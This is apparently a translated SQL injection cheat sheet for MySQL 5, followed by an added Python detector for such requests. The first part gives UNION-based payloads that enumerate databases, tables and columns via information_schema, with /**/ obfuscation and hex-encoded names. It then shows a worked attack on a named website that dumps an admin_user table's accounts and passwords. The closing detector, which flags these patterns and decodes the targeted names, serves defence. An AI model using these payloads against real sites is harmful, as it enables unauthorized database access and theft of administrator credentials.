Enumerate databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1 (库的HEX值 = the hex value of the database name)

Enumerate columns
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1 (表的HEX值 = the hex value of the table name)

MySQL 5 advanced injection method: dumping tables
Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Enumerating this way, the admin_user table appeared at the 4th entry.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
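
Added example (not part of the original post): a Python check a defender can run over web-server request targets to flag the information_schema enumeration shown above and to decode the hex-encoded schema and table names being asked about. The sample requests and the /item.php path are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed request targets modelled on the queries in the post (path is hypothetical).
SAMPLE_REQUESTS = [
    "/item.php?id=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From"
    "/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "/item.php?id=13240%2F**%2Funion%2F**%2Fselect%2F**%2F1,2,3,COLUMN_NAME,5%2F**%2Ffrom"
    "%2F**%2Finformation_schema.COLUMNS%2F**%2Fwhere%2F**%2FTABLE_NAME=0x61646D696E5F75736572",
    "/item.php?id=13240",
    "/search.php?q=credit+union+select+committee",
]

COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)  # closed and unterminated /* comments
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b")
META = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b")
HEXLIT = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")

def normalize(target):
    """URL-decode, turn SQL comments into spaces, lowercase, collapse whitespace."""
    text = COMMENT.sub(" ", unquote_plus(target))
    return re.sub(r"\s+", " ", text).lower().strip()

def analyze(target):
    """Return a finding dict for one request target, or None when nothing matches."""
    text = normalize(target)
    union, meta = UNION.search(text), META.search(text)
    if not (union or meta):
        return None
    names = []
    for digits in HEXLIT.findall(text):
        raw = bytes.fromhex(digits)
        if all(32 <= b < 127 for b in raw):  # keep only printable ASCII
            names.append(raw.decode("ascii"))
    return {
        # "union select" alone also matches ordinary text, so it is only "review"
        "severity": "high" if union and meta else "review",
        "metadata_view": meta.group(1) if meta else None,
        "hex_names": names,  # schema/table names the request was asking about
    }

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(analyze(req), "<-", req[:40])
```

Normalizing before matching is what defeats the `/**/` spacing and URL encoding; the decoded hex names tell an incident responder which schema and table were targeted.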